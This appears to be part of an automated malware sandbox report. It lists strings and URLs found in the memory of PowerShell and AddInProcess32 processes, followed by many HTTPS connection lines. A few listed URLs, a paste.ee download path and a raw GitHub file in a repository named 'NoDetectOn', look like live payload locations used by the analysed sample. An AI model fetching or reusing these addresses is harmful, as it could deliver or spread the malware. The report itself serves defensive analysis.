            Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 00000008.00000002.2302182137.00000180DA4E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: powershell.exe, 00000008.00000002.2302182137.00000180DA1BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
            Source: chromecache_187.15.drString found in binary or memory: http://schema.org/Organization
            Source: powershell.exe, 00000005.00000002.2173365893.00000194BA6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2457245723.000001CABC4EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000008.00000002.2302182137.00000180DA20D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://aka.ms/aiskillschallenge/T1LearnBanner?wt.mc_id=aisc25_learnpromo1_website_cnl
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://aka.ms/certhelp
            Source: chromecache_187.15.drString found in binary or memory: https://aka.ms/feedback/report?space=61
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://aka.ms/msignite_docs_banner
            Source: powershell.exe, 00000005.00000002.2173365893.00000194BA727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2173365893.00000194BA747000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2457245723.000001CABC439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2457245723.000001CABC44D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://aka.ms/pshelpmechoose
            Source: chromecache_187.15.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: chromecache_187.15.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
            Source: chromecache_187.15.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://channel9.msdn.com/
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
            Source: powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
            Source: svchost.exe, 0000000E.00000003.2301946567.000001C4FB120000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/Thraka
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/Youssef1313
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/adegeo
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://github.com/dotnet/try
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/gewarren
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://github.com/js-cookie/js-cookie
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/mairaw
            Source: chromecache_187.15.drString found in binary or memory: https://github.com/nschonni
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D9B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000006.00000002.2499500566.000001CAD446B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
            Source: chromecache_187.15.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
            Source: powershell.exe, 00000008.00000002.2302182137.00000180DA4E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
            Source: qmgr.db.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
            Source: powershell.exe, 00000008.00000002.2302182137.00000180DA20D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000008.00000002.2302182137.00000180DA20D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/XlUYO/0
            Source: powershell.exe, 00000008.00000002.2302182137.00000180DA1B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D9E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D9E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D9E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtJhu;
            Source: chromecache_186.15.drString found in binary or memory: https://schema.org
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
            Source: chromecache_186.15.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: powershell.exe, 00000008.00000002.2302182137.00000180D8E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2302182137.00000180D8FB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56039
            Source: unknownNetwork traffic detected: HTTP traffic on port 55842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56040
            Source: unknownNetwork traffic detected: HTTP traffic on port 55601 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55475 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55429 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55693 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55590 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 55499 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 55831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 55613 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55453 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 55773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55578 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55417 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55589 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 55533 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55519 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55397
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55398
            Source: unknownNetwork traffic detected: HTTP traffic on port 55439 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55465 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55477 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55399
            Source: unknownNetwork traffic detected: HTTP traffic on port 55602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56013
            Source: unknownNetwork traffic detected: HTTP traffic on port 55566 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55405 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55531 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55967 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55603 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55532 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55599 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56026
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56027
            Source: unknownNetwork traffic detected: HTTP traffic on port 55455 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55593 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55484 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55570 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55918
            Source: unknownNetwork traffic detected: HTTP traffic on port 55450 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55919
            Source: unknownNetwork traffic detected: HTTP traffic on port 55496 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55627 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55409 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55443 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55581 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55809
            Source: unknownNetwork traffic detected: HTTP traffic on port 56012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55495 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55800
            Source: unknownNetwork traffic detected: HTTP traffic on port 55873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55802
            Source: unknownNetwork traffic detected: HTTP traffic on port 55930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55408 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55569 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55685 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55649 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55473 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55810
            Source: unknownNetwork traffic detected: HTTP traffic on port 55765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55812
            Source: unknownNetwork traffic detected: HTTP traffic on port 55918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55431 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55813
            Source: unknownNetwork traffic detected: HTTP traffic on port 55674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55930
            Source: unknownNetwork traffic detected: HTTP traffic on port 55592 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55604 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55547 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55497 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55640 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55451 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55474 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55605 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55628 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55580 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55419 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55485 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55579 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55591 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55557 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55501 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55407 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55441 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55470 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55627
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55628
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55629
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55502
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55623
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55865
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55867
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55861
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55620
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55500
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55863
            Source: unknownNetwork traffic detected: HTTP traffic on port 56027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55501
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55622
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55864
            Source: unknownNetwork traffic detected: HTTP traffic on port 55412 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55435 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55991
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55992
            Source: unknownNetwork traffic detected: HTTP traffic on port 55458 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55400 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55641 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55517
            Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55518
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55519
            Source: unknownNetwork traffic detected: HTTP traffic on port 55446 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55514
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55756
            Source: unknownNetwork traffic detected: HTTP traffic on port 55824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55757
            Source: unknownNetwork traffic detected: HTTP traffic on port 55859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55516
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55631
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55873
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55632
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55754
